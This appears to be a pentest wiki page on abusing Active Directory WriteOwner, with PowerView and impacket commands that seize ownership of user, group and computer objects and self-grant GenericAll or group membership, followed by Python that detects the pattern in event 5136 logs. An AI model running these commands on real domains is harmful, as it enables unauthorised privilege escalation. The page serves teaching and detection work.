# WriteOwner

If a principal holds the Modify owner permission on an object, BloodHound displays it as WriteOwner: the right to change the owner of the target object. Once ownership has been taken over, the follow-on abuse depends on the type of the target. The table below summarises the attack that can be carried out after the owner has been changed.

| Target type | Abuse of the permission                  |
| ----------- | ---------------------------------------- |
| User        | Change owner → grant GenericAll to self  |
| Group       | Change owner → grant AddMembers to self  |
| Computer    | Change owner → grant GenericAll to self  |

## User

<figure><img src="/files/gTIUllPiVI7pofvm1wXI" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Store the credentials of user-A (the principal holding WriteOwner) in a variable
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># Change the owner of user-B to user-A
</strong>Set-DomainObjectOwner -Credential $Cred -Identity 'user-B' -OwnerIdentity 'user-A'

<strong># Grant GenericAll on user-B to user-A
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'user-B' -Rights 'all' -PrincipalIdentity 'user-A'
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># Change ownership
</strong>impacket-owneredit -action write -new-owner user-A -target user-B contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Grant GenericAll (FullControl) using impacket
</strong>impacket-dacledit -action write -rights FullControl -principal user-A -target user-B contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Restore the original DACL from the backup dacledit wrote
</strong>impacket-dacledit -action restore -file dacledit-20250630-221422.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11
</code></pre>

{% endtab %}
{% endtabs %}

## Group

<figure><img src="/files/Fq4OUpfhPNawfqibguz1" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Store the credentials of user-A (the principal holding WriteOwner) in a variable
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># Change ownership of the group to user-A
</strong>Set-DomainObjectOwner -Credential $Cred -Identity 'local_member' -OwnerIdentity 'user-A'

<strong># Grant GenericAll on the group to user-A
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'local_member' -Rights 'all' -PrincipalIdentity 'user-A'

<strong># Add user-A to the group
</strong>Add-DomainGroupMember -Identity 'local_member' -Members 'user-A' -Credential $Cred
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># Change ownership
</strong>impacket-owneredit -action write -new-owner user-A -target local_member contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Grant WriteMembers via the owner's implicit WriteDACL
</strong>impacket-dacledit -action write -rights WriteMembers -principal user-A -target local_member contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Add user-A to the group
</strong>bloodyAD -u user-A -p 'Password123!' -d contoso.com --host 192.168.1.11 add groupMember local_member user-A

<strong># Restore the original DACL from the backup dacledit wrote
</strong>impacket-dacledit -action restore -file dacledit-20250630-230117.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11
</code></pre>

{% endtab %}
{% endtabs %}

## Computer

<figure><img src="/files/4el7Jlq1dQBT7rvQOHPe" alt=""><figcaption></figcaption></figure>

{% tabs %}
{% tab title="Windows" %}

<pre class="language-powershell"><code class="lang-powershell"><strong># Store the credentials of user-A (the principal holding WriteOwner) in a variable
</strong>$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('contoso\user-A', $SecPassword)

<strong># Change ownership of the computer account to user-A
</strong>Set-DomainObjectOwner -Credential $Cred -Identity 'local-machine$' -OwnerIdentity 'user-A'

<strong># Grant GenericAll on the computer account to user-A
</strong>Add-DomainObjectAcl -Credential $Cred -TargetIdentity 'local-machine$' -Rights 'all' -PrincipalIdentity 'user-A'
</code></pre>

{% endtab %}

{% tab title="UNIX" %}

<pre class="language-bash"><code class="lang-bash"><strong># Change ownership
</strong>impacket-owneredit -action write -new-owner user-A -target local-machine$ contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Grant GenericAll (FullControl) via the owner's implicit WriteDACL
</strong>impacket-dacledit -action write -rights FullControl -principal user-A -target local-machine$ contoso/user-A:'Password123!' -dc-ip 192.168.1.11

<strong># Restore the original DACL from the backup dacledit wrote
</strong>impacket-dacledit -action restore -file dacledit-20250630-223138.bak contoso/user-A:'Password123!' -dc-ip 192.168.1.11
</code></pre>

{% endtab %}
{% endtabs %}
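From the detection side, every step in the User, Group and Computer sections above rewrites the target's nTSecurityDescriptor, which a domain controller with object-change auditing enabled records as Directory Service event 5136 (one "Value Deleted" and one "Value Added" entry carrying the old and new SDDL). The Python below is an added example, not code from the original page or from the tools it covers: it diffs such a pair and flags the pattern the page describes, an owner change to the modifying principal followed by a self-granted GenericAll (`GA`) or WriteMembers (`WP` on the `member` attribute). The SIDs and SDDL strings are constructed sample values; the `member` schema GUID is the real one.

```python
import re

# Schema GUID of the "member" attribute; WP on it is what BloodHound calls WriteMembers/AddMembers.
MEMBER_ATTR_GUID = "bf9679c0-0de6-11d0-a285-00aa003049e2"

def parse_sddl(sddl):
    """Return (owner, {(rights, object_guid, trustee)}) for the allow ACEs in an SDDL string."""
    owner = re.search(r"O:(.*?)(?=[GDS]:|$)", sddl)
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    aces = set()
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        f = ace.split(";")
        if len(f) >= 6 and f[0] in ("A", "OA"):      # access-allowed (object) ACEs only
            aces.add((f[2], f[3].lower(), f[5]))
    return (owner.group(1) if owner else None), aces

def describe_right(rights, object_guid):
    """Map an ACE's rights string to the abuse primitive it enables, or None."""
    tokens = {rights[i:i + 2] for i in range(0, len(rights), 2)}   # SDDL rights are 2-letter codes
    if "GA" in tokens:
        return "GenericAll"
    if "WP" in tokens and object_guid == MEMBER_ATTR_GUID:
        return "WriteMembers"
    if tokens & {"WD", "WO"}:
        return "WriteDacl/WriteOwner"
    return None

def analyze_sd_change(old_sddl, new_sddl, subject_sid):
    """Compare the deleted/added nTSecurityDescriptor values of a 5136 event pair."""
    old_owner, old_aces = parse_sddl(old_sddl)
    new_owner, new_aces = parse_sddl(new_sddl)
    findings = []
    if old_owner != new_owner:
        findings.append(f"owner changed {old_owner} -> {new_owner}")
        if new_owner == subject_sid:
            findings.append("new owner is the modifying principal (WriteOwner abuse pattern)")
    for rights, guid, trustee in sorted(new_aces - old_aces):   # only ACEs that were added
        label = describe_right(rights, guid)
        if label and trustee == subject_sid:
            findings.append(f"self-granted {label}")
        elif label:
            findings.append(f"granted {label} to {trustee}")
    return findings

# Constructed sample values: user-A's SID and the Domain Admins SID of a made-up domain.
USER_A = "S-1-5-21-1000-2000-3000-1105"
DOMAIN_ADMINS = "S-1-5-21-1000-2000-3000-512"
OLD_SD = f"O:{DOMAIN_ADMINS}G:{DOMAIN_ADMINS}D:(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;{DOMAIN_ADMINS})(A;;RPLCLORC;;;AU)"
NEW_SD_USER = f"O:{USER_A}G:{DOMAIN_ADMINS}D:(A;;GA;;;{USER_A})(A;;RPWPCRCCDCLCLORCWOWDSDDTSW;;;{DOMAIN_ADMINS})(A;;RPLCLORC;;;AU)"
NEW_SD_GROUP = f"O:{USER_A}G:{DOMAIN_ADMINS}D:(OA;;WP;{MEMBER_ATTR_GUID};;{USER_A})(A;;RPLCLORC;;;AU)"
```

Calling `analyze_sd_change(OLD_SD, NEW_SD_USER, USER_A)` reproduces the User/Computer chain (owner change, then self-granted GenericAll), and `NEW_SD_GROUP` the Group chain (self-granted WriteMembers); an ACL write by a principal who also became the owner moments earlier is the signal worth alerting on.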

## References

{% embed url="https://medium.com/@persecure/baby2-vulnlab-33fa8a52d245" %}

{% embed url="https://www.xn--hy1b43d247a.com/privilege-escalation/ad-dacl/writeowner" %}
